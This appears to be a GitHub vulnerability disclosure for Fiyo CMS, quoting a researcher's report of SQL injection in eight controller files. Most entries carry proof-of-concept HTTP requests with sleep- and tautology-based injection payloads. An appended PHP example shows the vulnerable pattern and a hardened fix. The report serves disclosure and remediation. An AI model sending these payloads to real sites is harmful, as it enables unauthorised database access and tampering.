Many SQL injections in Fiyo CMS #5
Comments
Thanks, we have updated it in the new version.
I'm so grateful for your information.
Thanks, regards.
On 17 July 2017 at 12:49, iflody <***@***.***> wrote:

1. In /apps/app_article/controller/editor.php

$_POST['id'] has no filters and $_POST['art_title'] only filters the double quote. So we can inject into this SQL statement. Because it uses PDO to connect to the MySQL server, we can use a stacked query to execute any SQL statement.

```http
POST /fiyo/apps/app_article/controller/editor.php HTTP/1.1
Referer: http://localhost

id=" and sleep(10)&art_title=123\
```

2. In /apps/app_comment/controller/insert.php

The $_POST parameters have some meaningless filters. So we can inject into this SQL statement. Because it uses PDO to connect to the MySQL server, we can use a stacked query to execute any SQL statement.

```http
POST /fiyo/apps/app_comment/controller/insert.php
Referer: http://localhost

send=true&name=1" or sleep(10) or ***@***.***&url=11&text=11111&captcha=undefined&link=%3Fapp%3Darticle%26view%3Ditem%26id%3D184
```

3. In dapur/apps/app_article/controller/article_list.php

$_GET[cat], $_GET[user], $_GET[level] and $_GET['iSortCol_'.$i] have no filters at all. So we can inject into this SQL statement. Because it uses PDO to connect to the MySQL server, we can use a stacked query to execute any SQL statement.

```http
GET /fiyo/dapur/apps/app_article/controller/article_list.php?cat='%20orsleep(10)%20or%20'1&user=&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1500268118960
Referer: http://localhost
```

4. In dapur/apps/app_article/controller/article_status.php

$_GET['id'] has no filters and it will be injected into the SQL statement. Because it uses PDO to connect to the MySQL server, we can use a stacked query to execute any SQL statement.

```http
GET /fiyo/dapur/apps/app_article/controller/article_status.php?fp=1&id=1'or'1
Referer: http://localhost
```

5. In dapur/apps/app_article/controller/comment_status.php

$_GET['id'] has no filters and it will be injected into the SQL statement. Because it uses PDO to connect to the MySQL server, we can use a stacked query to execute any SQL statement.

```http
GET /fiyo/dapur/apps/app_article/controller/comment_status.php?stat=1&id=1'or'1
Referer: http://localhost
```

6. In dapur/apps/app_article/sys_article.php

"$_POST[parent_id]", "$_POST[desc]", "$_POST[keys]" and "$_POST[level]" have no filters and they will be injected into the SQL statement. Because it uses PDO to connect to the MySQL server, we can use a stacked query to execute any SQL statement.

In add category and edit category there are similar problems. In add article and edit article many parameters have not been filtered.

The attack vector is so simple and too many attack vectors could be used, so I will not write the details.

7. In dapur/apps/app_comment/controller/comment_status.php

$_GET['id'] has no filters and it will be injected into the SQL statement. Because it uses PDO to connect to the MySQL server, we can use a stacked query to execute any SQL statement.

```http
GET /fiyo/dapur/apps/app_comment/controller/comment_status.php?stat=1&id=1'or'1
Referer: http://localhost
```

8. In dapur/apps/app_comment/sys_comment.php

In the edit comment component: $_POST[comment], $_POST[name], $_POST[web], $_POST[email], $_POST[status] and $_POST[id] have no filters and they will be injected into the SQL statement. Because it uses PDO to connect to the MySQL server, we can use a stacked query to execute any SQL statement.

In the enable comment and disable comment components: $_REQUEST['id'] has no filters and it will be injected into the SQL statement. Because it uses PDO to connect to the MySQL server, we can use a stacked query to execute any SQL statement.

The attack vector is so simple and too many attack vectors could be used, so I will not write the details.

Discoverer: Valo & Melody from Chaitin Tech
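Added example, not Fiyo CMS code: the unfiltered-$_GET-into-PDO pattern the report describes, beside a hardened form that validates and binds every value, maps the DataTables iSortCol_0 index used by article_list.php onto an allowlisted ORDER BY column (identifiers cannot be bound), and configures PDO so that stacked queries are refused. Table and column names are hypothetical.

```php
<?php
// Added example, not Fiyo CMS code. Table and column names are hypothetical.

// Shape the report describes: request values are concatenated into the SQL text.
// Under PDO's default emulated prepares the MySQL driver also accepts stacked
// queries, so one injected quote can run arbitrary statements.
function commentStatusUnsafe(PDO $db, array $get): void
{
    $db->exec("UPDATE comment SET status = '{$get['stat']}' WHERE id = {$get['id']}");
}

// Hardened: validate the type and range of every input, then bind it as a parameter.
function commentStatusSafe(PDO $db, array $get): int
{
    $id   = filter_var($get['id'] ?? null, FILTER_VALIDATE_INT);
    $stat = filter_var($get['stat'] ?? null, FILTER_VALIDATE_INT,
                       ['options' => ['min_range' => 0, 'max_range' => 1]]);
    if ($id === false || $stat === false) {
        throw new InvalidArgumentException('id and stat must be integers');
    }
    $stmt = $db->prepare('UPDATE comment SET status = :stat WHERE id = :id');
    $stmt->bindValue(':stat', $stat, PDO::PARAM_INT);
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

// Identifiers cannot be bound. The DataTables iSortCol_0 / sSortDir_0 values that
// article_list.php reads must be mapped onto an allowlist, never interpolated.
function articleOrderBy(array $get): string
{
    $columns = ['id', 'title', 'user', 'cat', 'level', 'date', 'hits']; // hypothetical
    $idx = filter_var($get['iSortCol_0'] ?? 0, FILTER_VALIDATE_INT);
    $col = ($idx !== false && isset($columns[$idx])) ? $columns[$idx] : 'id';
    $dir = (strtolower((string) ($get['sSortDir_0'] ?? 'asc')) === 'desc') ? 'DESC' : 'ASC';
    return "ORDER BY `$col` $dir";
}

// Connection settings that remove the stacked-query vector itself: native
// server-side prepares send values separately from the SQL text, and the MySQL
// driver can be told to refuse multiple statements per call outright.
function connect(string $dsn, string $user, string $pass): PDO
{
    return new PDO($dsn, $user, $pass, [
        PDO::ATTR_ERRMODE                => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES       => false,
        PDO::MYSQL_ATTR_MULTI_STATEMENTS => false,
    ]);
}
```

With emulated prepares disabled, the id=1'or'1 style inputs shown above are rejected by filter_var before any SQL is built, and even a literal value that slipped through would be sent as a typed parameter rather than SQL text.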